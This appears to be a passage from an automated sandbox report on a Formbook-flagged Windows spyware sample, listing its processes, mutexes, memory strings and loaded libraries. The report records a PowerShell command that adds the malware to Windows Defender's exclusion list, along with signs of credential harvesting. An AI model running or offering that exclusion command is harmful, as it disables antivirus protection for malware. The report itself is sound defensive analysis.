            Source: 00000006.00000002.2322275427.00000000040C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, 00000000.00000002.2454248653.000001DF0A114000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdbPROFILE_STRING=Internet ExplorerFPS_BROWSER_USER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocaQ,
            Source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe, 00000000.00000002.2454248653.000001DF0A0A3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb
            Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@21/32@12/10
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeFile created: C:\Users\user\AppData\Local\Microsoft\Media Player\Transcoded Files Cache
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeMutant created: \Sessions\1\BaseNamedObjects\Local\Microsoft_WMP_70_CheckForOtherInstanceMutex
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
            Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1512
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2496:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5484:120:WilError_03
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ejalo0vz.3ve.ps1Jump to behavior
            Source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeStatic file information: TRID: Win64 Executable Console Net Framework (206006/5) 48.58%
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: sc.exe, 0000000D.00000002.3942849584.0000000002F9F000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 0000000D.00000002.3942849584.0000000002FCC000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 0000000D.00000003.2506456914.0000000002FA9000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 0000000D.00000003.2504141459.0000000002F9F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeReversingLabs: Detection: 21%
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeFile read: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe" -Force
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe | Process created: C:\Program Files (x86)\Windows Media Player\wmplayer.exe "C:\Program Files (x86)\Windows Media Player\wmplayer.exe"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe | Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 1512 -s 1456
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
            Source: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe | Process created: C:\Windows\SysWOW64\sc.exe "C:\Windows\SysWOW64\sc.exe"
            Source: unknown | Process created: C:\Program Files (x86)\Windows Media Player\wmplayer.exe "C:\Program Files (x86)\Windows Media Player\wmplayer.exe"
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Process created: C:\Windows\SysWOW64\unregmp2.exe "C:\Windows\System32\unregmp2.exe" /AsyncFirstLogon
            Source: C:\Windows\SysWOW64\unregmp2.exe | Process created: C:\Windows\System32\unregmp2.exe "C:\Windows\SysNative\unregmp2.exe" /AsyncFirstLogon /REENTRANT
            Source: unknown | Process created: C:\Program Files (x86)\Windows Media Player\wmplayer.exe "C:\Program Files (x86)\Windows Media Player\wmplayer.exe"
            Source: C:\Windows\SysWOW64\sc.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe | Section loaded: mscoree.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe | Section loaded: apphelp.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe | Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe | Section loaded: version.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe | Section loaded: vcruntime140_clr0400.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe | Section loaded: cryptsp.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe | Section loaded: rsaenh.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe | Section loaded: cryptbase.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe | Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe | Section loaded: amsi.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe | Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe | Section loaded: profapi.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe | Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe | Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe | Section loaded: propsys.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe | Section loaded: edputil.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe | Section loaded: urlmon.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe | Section loaded: iertutil.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe | Section loaded: srvcli.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe | Section loaded: netutils.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe | Section loaded: windows.staterepositoryps.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe | Section loaded: sspicli.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe | Section loaded: wintypes.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe | Section loaded: appresolver.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe | Section loaded: bcp47langs.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe | Section loaded: slc.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe | Section loaded: sppc.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe | Section loaded: onecorecommonproxystub.dll
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.PWSX-gen.14792.13715.exe | Section loaded: onecoreuapcommonproxystub.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: fastprox.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: ncobjapi.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mpclient.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: userenv.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: version.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: userenv.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: msasn1.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wmitomi.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mi.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: miutils.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: miutils.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: gpapi.dll
            Source: C:\Windows\SysWOW64\sc.exe | Section loaded: wininet.dll
            Source: C:\Windows\SysWOW64\sc.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\sc.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\sc.exe | Section loaded: ieframe.dll
            Source: C:\Windows\SysWOW64\sc.exe | Section loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\sc.exe | Section loaded: netapi32.dll
            Source: C:\Windows\SysWOW64\sc.exe | Section loaded: version.dll
            Source: C:\Windows\SysWOW64\sc.exe | Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\sc.exe | Section loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\sc.exe | Section loaded: wkscli.dll
            Source: C:\Windows\SysWOW64\sc.exe | Section loaded: netutils.dll
            Source: C:\Windows\SysWOW64\sc.exe | Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\sc.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\sc.exe | Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\sc.exe | Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\sc.exe | Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\sc.exe | Section loaded: mlang.dll
            Source: C:\Windows\SysWOW64\sc.exe | Section loaded: propsys.dll
            Source: C:\Windows\SysWOW64\sc.exe | Section loaded: winsqlite3.dll
            Source: C:\Windows\SysWOW64\sc.exe | Section loaded: vaultcli.dll
            Source: C:\Windows\SysWOW64\sc.exe | Section loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\sc.exe | Section loaded: dpapi.dll
            Source: C:\Windows\SysWOW64\sc.exe | Section loaded: cryptbase.dll
            Source: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe | Section loaded: wininet.dll
            Source: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe | Section loaded: mswsock.dll
            Source: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe | Section loaded: dnsapi.dll
            Source: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe | Section loaded: iphlpapi.dll
            Source: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe | Section loaded: fwpuclnt.dll
            Source: C:\Program Files (x86)\NXLBzGBJZEKXLSDXbGEARvNAbdTqqXUHbIINICYaWMGxMje\NwXvnHITawmpBkkZKEXJ.exe | Section loaded: rasadhlp.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: uxtheme.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: windows.storage.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: wldp.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: kernel.appcore.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: propsys.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: profapi.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: edputil.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: urlmon.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: iertutil.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: srvcli.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: netutils.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: windows.staterepositoryps.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: sspicli.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: wintypes.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: appresolver.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: bcp47langs.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: slc.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: userenv.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: sppc.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: onecorecommonproxystub.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: onecoreuapcommonproxystub.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: wmp.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: gnsdk_fp.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: cryptsp.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: ntmarta.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: wmvcore.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: dwmapi.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: mfperfhelper.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: wmasf.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: mfperfhelper.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: wmploc.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: atlthunk.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: jscript.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: amsi.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: version.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: sxs.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: textshaping.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: windowscodecs.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: msimg32.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: textinputframework.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: coreuicomponents.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: coremessaging.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: coremessaging.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: mmdevapi.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: devobj.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: mfplat.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: rtworkq.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: audioses.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: powrprof.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: umpdc.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: windows.ui.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: windowmanagementapi.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: inputhost.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: twinapi.appcore.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: twinapi.appcore.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: netprofm.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: npmproxy.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: msasn1.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: gpapi.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: dataexchange.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: d3d11.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: dcomp.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: dxgi.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: wtsapi32.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: winsta.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: imapi2.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: wininet.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: mswmdm.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: cewmdm.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: wmdmps.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: ondemandconnroutehelper.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: winhttp.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: mswsock.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: iphlpapi.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: winnsi.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: upnp.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: ssdpapi.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: explorerframe.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: linkinfo.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: ntshrui.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: cscapi.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: policymanager.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: msvcp110_win.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: shsvcs.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: wmpps.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: windows.security.authentication.onlineid.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: dpapi.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: cryptbase.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: onesettingsclient.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: dhcpcsvc6.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: dhcpcsvc.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: webio.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: dnsapi.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: rasadhlp.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: fwpuclnt.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: schannel.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: mskeyprotect.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: ntasn1.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: ncrypt.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: ncryptsslp.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: rsaenh.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: cryptnet.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: comppkgsup.dll
            Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exe | Section loaded: xmllite.dll
            Source: C:\Windows\SysWOW64\unregmp2.exe | Section loaded: version.dll
            Source: C:\Windows\SysWOW64\unregmp2.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\unregmp2.exe | Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\unregmp2.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\unregmp2.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\unregmp2.exe | Section loaded: propsys.dll
            Source: C:\Windows\SysWOW64\unregmp2.exe | Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\unregmp2.exe | Section loaded: edputil.dll
            Source: C:\Windows\SysWOW64\unregmp2.exe | Section loaded: urlmon.dll
            Source: C:\Windows\SysWOW64\unregmp2.exe | Section loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\unregmp2.exe | Section loaded: srvcli.dll
            Source: C:\Windows\SysWOW64\unregmp2.exe | Section loaded: netutils.dll
